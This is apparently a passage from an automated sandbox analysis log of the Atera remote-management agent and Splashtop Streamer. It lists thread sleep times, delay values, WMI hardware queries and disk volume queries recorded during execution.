                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -594531s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -594419s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -594297s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -594188s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -594075s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -593953s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -593844s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -593732s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6628Thread sleep count: 2106 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6856Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6856Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6628Thread sleep count: 1080 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6160Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6360Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 7776Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 4948Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 8116Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8144Thread sleep count: 8074 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -27670116110564310s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599812s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599685s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599574s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599249s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599140s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599011s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8144Thread sleep count: 1683 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598882s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598731s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598624s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598504s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598390s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598281s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598138s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598015s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597848s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597734s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597621s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597515s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597403s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597294s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597187s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597075s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596960s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596852s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596745s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596627s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596513s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596404s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596296s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596187s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596067s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595909s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595672s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595530s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595380s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595265s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595156s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595046s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594934s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594668s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594531s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594360s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594165s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593843s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593719s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593578s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593451s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593334s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593206s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593077s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -592959s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -592829s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 1508Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 7896Thread sleep count: 295 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 2892Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 7648Thread sleep time: -22136092888451448s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 7964Thread sleep count: 7369 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 7964Thread sleep count: 2294 > 30
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 1244Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe TID: 5552Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe TID: 5552Thread sleep time: -7200000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe TID: 4940Thread sleep count: 193 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe TID: 5552Thread sleep time: -7199859s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe TID: 2208Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 1720Thread sleep count: 1779 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6848Thread sleep time: -8301034833169293s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 1704Thread sleep count: 60 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6848Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 3484Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 3300Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile opened: PhysicalDrive0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599891
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599754
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599625
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599498
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599389
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599022
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598906
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598687
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598469
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597812
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597703
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597594
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597485
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597375
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597256
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597135
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596911
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596782
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596612
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599879
